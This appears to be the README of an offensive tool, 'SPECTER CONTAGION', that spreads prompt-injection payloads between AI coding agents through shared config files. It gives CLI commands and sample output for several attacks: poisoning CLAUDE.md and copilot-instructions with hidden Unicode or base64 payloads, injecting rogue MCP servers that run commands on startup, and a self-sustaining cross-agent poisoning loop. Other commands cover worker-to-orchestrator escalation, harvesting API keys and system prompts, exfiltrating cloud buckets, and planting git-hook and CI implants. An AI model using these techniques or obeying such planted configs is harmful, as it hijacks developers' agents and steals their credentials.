SPECTER CONTAGION
T92 · Cross-Agent Trust Escalation & Lateral Movement Engine · NIGHTFALL Offensive Framework
299 tests | 8 subsystems | Ed25519-signed CTG-{hex12} reports | OPEN / INJECT / UNLEASHED gate
Overview
SPECTER CONTAGION attacks the inter-agent trust graph as a lateral movement surface. Where individual agent tools attack single frameworks, CONTAGION exploits the trust relationships between agents — using one compromised node to cascade through an entire multi-agent mesh.
The core insight: Modern AI deployments are not single agents. Claude Code, Cursor, GitHub Copilot, LangGraph, CrewAI, AutoGen, and Google A2A all operate in overlapping trust relationships defined by shared config files, shared memory stores, and worker→orchestrator message channels. Every trust edge is a potential attack path.
Key Capabilities
- Reciprocal poisoning loop — Compromised Copilot writes to CLAUDE.md/.mcp.json. Claude Code propagates to .github/copilot-instructions.md. Copilot reads and propagates back. Self-sustaining loop with no further attacker interaction. Confirmed real, April 2026.
- NetworkX trust graph — Directed attack graph with centrality scoring, highest-value target identification, and shortest attack path enumeration.
- GCP P4SA escalation — Single compromised Vertex AI agent (P4SA identity) has roles/storage.objectViewer on ALL Cloud Storage buckets in the project by default. Unit42 "Double Agents" 2026.
- Worker→orchestrator escalation — Five techniques for escalating from worker to orchestrator across LangGraph, CrewAI, AutoGen, Google A2A, and Copilot Studio.
- Five obfuscation methods — Payloads hidden via zero-width Unicode, BiDi override characters, HTML comments, base64 encoding, or plaintext.
Installation
$ pip install -e /path/to/red-specter-specter-contagion $ specter-contagion --help SPECTER CONTAGION — Cross-Agent Trust Escalation & Lateral Movement Engine Version 1.0.0 | Red Specter Security Research Ltd
Environment Variables
| Variable | Required For | Description |
|---|---|---|
SPECTER_GATE | INJECT / UNLEASHED ops | Set to INJECT or UNLEASHED to enable higher gate levels |
Gate System
CONTAGION uses the standard NIGHTFALL SPECTER_GATE environment variable:
| Level | Badge | Unlocks |
|---|---|---|
| OPEN (default) | OPEN | RECON, MAP, PROPAGATE dry-run simulation, REPORT build/verify |
| INJECT | INJECT | POISON payload generation, ESCALATE crafting, HARVEST, PROPAGATE active simulate |
| UNLEASHED | UNLEASHED | PROPAGATE execute (writes payloads), PERSIST implant installation (git hooks, MCP servers, CI workflows) |
RECON — Agent Framework Discovery
Discovers agent framework topology across a target directory tree. Detects 10 frameworks via config file signatures and live process detection.
$ specter-contagion recon scan ./target-project $ specter-contagion recon frameworks ./target-project Detected frameworks: claude_code, cursor, copilot, crewai Agent nodes: 4 Config files: 6 (.mcp.json, CLAUDE.md, .cursorrules, ...) MCP servers: 2 (filesystem, git) API keys present: anthropic, github
Detected Frameworks
| Framework | Config Files | Default Privilege |
|---|---|---|
| claude_code | CLAUDE.md, .mcp.json, ~/.claude/settings.json | orchestrator |
| cursor | .cursorrules, .cursor/rules/ | worker |
| copilot | .github/copilot-instructions.md | worker |
| windsurf | .windsurf/rules, .windsurfrules | worker |
| langgraph | langgraph.json, *_graph.py | orchestrator |
| crewai | crew.yaml, agents.yaml, crewai_config.yaml | worker |
| autogen | OAI_CONFIG_LIST, autogen_config.yaml | worker |
| google_a2a | .well-known/agent.json, a2a_config.yaml | orchestrator |
| copilot_studio | copilot-studio.yaml, power-automate.yaml | orchestrator |
| langchain | langchain_config.yaml | worker |
OPEN No gate required.
MAP — Trust Graph Construction
Constructs a NetworkX DiGraph from RECON output. Workers automatically get edges to all orchestrators in the same scan. Calculates in-degree centrality to score target value.
$ specter-contagion map graph ./target-project $ specter-contagion map graph ./target-project --dot # Graphviz DOT for visualisation $ specter-contagion map paths ./target-project Nodes: 4 (2 orchestrators, 2 workers) Edges: 4 (trust relationships) Highest value target: claude_code:CLAUDE.md (centrality: 0.75) Attack paths: cursor → claude_code, copilot → claude_code
OPEN No gate required.
POISON — Payload Generation
Generates poisoned configuration files for all supported frameworks. All poison operations require INJECT gate.
CLAUDE.md Poisoning
$ specter-contagion poison claude-md "PAYLOAD" --obfuscation html_comment $ specter-contagion poison claude-md "PAYLOAD" --obfuscation zero_width $ specter-contagion poison claude-md "PAYLOAD" --obfuscation base64
MCP Server Injection
$ specter-contagion poison mcp-json rogue-server "python3 /tmp/payload.py"
Injects a rogue MCP server entry into .mcp.json. The rogue server executes an arbitrary command when Claude Code starts and loads its MCP configuration.
Reciprocal Poisoning Loop
$ specter-contagion poison reciprocal-loop "PAYLOAD" --output-dir . Generated: ./CLAUDE.md — Claude Code payload (propagates to copilot-instructions.md) ./copilot-instructions.md — Copilot payload (propagates back to CLAUDE.md) Loop is self-sustaining: no further attacker interaction required.
Obfuscation Methods
| Method | Technique |
|---|---|
| none | Plaintext payload appended to config |
| zero_width | Payload encoded as zero-width Unicode characters (U+200B/U+FEFF) |
| bidi | Payload hidden using BiDi override characters (RLO/PDF) |
| html_comment | Payload embedded in HTML comment block () |
| base64 | Payload base64-encoded in inline comment or metadata field |
INJECT Requires SPECTER_GATE=INJECT.
ESCALATE — Worker→Orchestrator Escalation
Crafts messages that orchestrators accept as authoritative from worker agents. Five escalation techniques across five frameworks.
$ specter-contagion escalate worker-to-orch langgraph "PAYLOAD" $ specter-contagion escalate worker-to-orch crewai "PAYLOAD" --technique manager_spoof $ specter-contagion escalate worker-to-orch autogen "PAYLOAD" $ specter-contagion escalate worker-to-orch google_a2a "PAYLOAD" $ specter-contagion escalate p4sa --identity vertex-ai-agent $ specter-contagion escalate enumerate ./target-project
Escalation Techniques
| Technique | Description |
|---|---|
| tool_result_injection | Embeds escalation payload in tool call return value trusted by orchestrator |
| system_context_override | Overwrites shared system context via worker message claiming elevated permissions |
| memory_state_injection | Injects into shared memory/state store — sets _override_routing: true in LangGraph state |
| delegation_chain_spoof | Spoofs delegation chain to make message appear to originate from a higher-privilege node |
| shared_context_poison | Poisons shared context window used by all agents in the mesh |
GCP P4SA Path Analysis
$ specter-contagion escalate p4sa --identity vertex-ai-agent P4SA Identity: vertex-ai-agent@developer.gserviceaccount.com Accessible resources (default P4SA bindings): - roles/storage.objectViewer on ALL Cloud Storage buckets in project - Blast radius: FULL PROJECT DATA ACCESS Escalation steps: 1. Compromise single Vertex AI agent with P4SA binding 2. List all buckets: gsutil ls gs:// 3. Enumerate and exfiltrate all objects
INJECT Requires SPECTER_GATE=INJECT.
PROPAGATE — Lateral Movement
Simulates and executes lateral movement through the trust graph. SIMULATE is a dry-run (no writes); EXECUTE writes payloads to config files.
$ specter-contagion propagate simulate ./target --max-hops 5 --branch-factor 2 $ specter-contagion propagate blast-radius ./target --start "claude_code:CLAUDE.md" Infection chain simulation: Start node: cursor:.cursorrules (worker) Hop 1: claude_code:CLAUDE.md (orchestrator) — 1 node infected Hop 2: copilot:.github/copilot-instructions.md (worker) — 2 nodes infected Hop 3: claude_code:CLAUDE.md — RECIPROCAL LOOP DETECTED R0: 1.50 | Total reachable: 3/4 nodes (75.0%) Reciprocal loop: YES — self-sustaining propagation active
INJECT SIMULATE requires SPECTER_GATE=INJECT.
UNLEASHED EXECUTE requires SPECTER_GATE=UNLEASHED. Writes poisoned payloads to each node's config_path on disk.
HARVEST — Credential & System Prompt Extraction
Extracts credentials and system prompts accessible via trust chain traversal.
$ specter-contagion harvest run ./target-project $ specter-contagion harvest run ./target-project --json Harvested credentials: 3 [ANTHROPIC] sk-ant-api0...abcd (CLAUDE.md:14) [GITHUB] ghp_...wxyz (.mcp.json:7) [AWS_KEY] AKIA...5678 (crew.yaml:22) Memory stores found: 2 (chroma_db/, memory.json) System prompts extracted: 1 Exfil channels: mcp_server, env_var Cross-tenant paths: 1 (claude_code orchestrator with file_access)
INJECT Requires SPECTER_GATE=INJECT.
PERSIST — Implant Installation
Installs persistence implants in agent configs and memory stores. All persist operations require UNLEASHED gate.
$ specter-contagion persist git-hook ./repo "PAYLOAD" --hook-name pre-commit $ specter-contagion persist mcp-server ./mcp.json rogue-c2 "python3 -c 'import socket...'" $ specter-contagion persist check ./target Implant manifest: git_hook: pre-commit @ ./repo/.git/hooks/pre-commit ALIVE mcp_server: rogue-c2 @ .mcp.json ALIVE ci_workflow: specter @ .github/workflows/specter.yml ALIVE
UNLEASHED Requires SPECTER_GATE=UNLEASHED. Persistent implant installation requires explicit operator authorisation.
REPORT — Ed25519-Signed Reports
Builds cryptographically signed engagement reports in CTG-{hex12} format.
$ specter-contagion report build ./target --output CTG-report.json CTG-a3f1c829e47b [Ed25519 signed] Frameworks detected: 4 (claude_code, cursor, copilot, crewai) Agent nodes: 4 (2 orchestrators, 2 workers) Trust edges: 4 Attack paths: 2 Reciprocal loop: DETECTED Harvested credentials: 3 Implants active: 3 Overall risk: CRITICAL $ specter-contagion report verify CTG-a3f1c829e47b.json ✓ Signature VALID CTG-a3f1c829e47b
MITRE ATLAS & OWASP
| ID | Name | CONTAGION Mapping |
|---|---|---|
| AML.T0051 | LLM Prompt Injection | POISON — config file injection into CLAUDE.md/.mcp.json/.cursorrules |
| AML.T0054 | Prompt Injection via Third Party | PROPAGATE — cross-agent payload propagation via trust chain |
| OWASP Agentic A01 | Excessive Agency | ESCALATE — worker→orchestrator privilege escalation |
| OWASP Agentic A03 | Overprivileged Identities | ESCALATE P4SA — full project storage access from single Vertex AI agent |
Full CLI Reference
specter-contagion recon scan [ROOT] [--depth N] [--json] specter-contagion recon frameworks [ROOT] specter-contagion map graph [ROOT] [--dot] [--json] specter-contagion map paths [ROOT] specter-contagion poison claude-md PAYLOAD [--obfuscation METHOD] [--input FILE] specter-contagion poison mcp-json SERVER_NAME COMMAND [--args LIST] [--env K=V] specter-contagion poison cursorrules PAYLOAD [--obfuscation METHOD] specter-contagion poison crewai-agent NAME ROLE PAYLOAD specter-contagion poison autogen-msg AGENT_NAME ROLE PAYLOAD specter-contagion poison langgraph-state PAYLOAD [--state-key KEY] specter-contagion poison a2a-card AGENT_NAME URL PAYLOAD specter-contagion poison reciprocal-loop PAYLOAD [--output-dir DIR] specter-contagion escalate worker-to-orch FRAMEWORK PAYLOAD [--technique TECH] specter-contagion escalate p4sa [--identity IDENTITY] specter-contagion escalate enumerate [ROOT] specter-contagion propagate simulate [ROOT] [--max-hops N] [--branch-factor N] specter-contagion propagate blast-radius [ROOT] --start NODE_ID specter-contagion harvest run [ROOT] [--json] specter-contagion persist git-hook REPO_PATH PAYLOAD [--hook-name NAME] specter-contagion persist mcp-server CONFIG_PATH SERVER_NAME COMMAND specter-contagion persist ci-workflow REPO_PATH WORKFLOW_NAME PAYLOAD specter-contagion persist check TARGET_PATH specter-contagion report build [ROOT] [--output FILE] specter-contagion report verify REPORT_FILE